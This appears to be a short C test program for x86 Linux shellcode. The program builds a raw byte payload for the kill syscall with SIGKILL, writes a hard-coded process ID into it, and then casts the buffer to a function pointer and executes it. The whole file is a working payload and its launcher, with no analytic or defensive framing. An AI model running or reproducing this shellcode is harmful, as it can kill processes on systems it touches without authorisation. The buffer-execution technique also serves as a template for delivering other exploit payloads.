
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int printf (char*,int) ;
 int strlen (char*) ;

int main()
{
 unsigned short pid = 2801;

 char shellcode[] =
 "\x31\xc0"
 "\xb0\x25"
 "\x89\xc3"
 "\x89\xc1"
 "\x66\xbb"
 "\xF1\x0A"
 "\xb1\x09"
 "\xcd\x80"
 "\xb0\x01"
 "\xcd\x80";

 shellcode[10] = pid & 0xff;
 shellcode[11] = (pid >> 8) & 0xff;

 printf("Shellcode length: %d\n", strlen(shellcode));
 int (*ret)() = (int(*)())shellcode;
 ret();
}
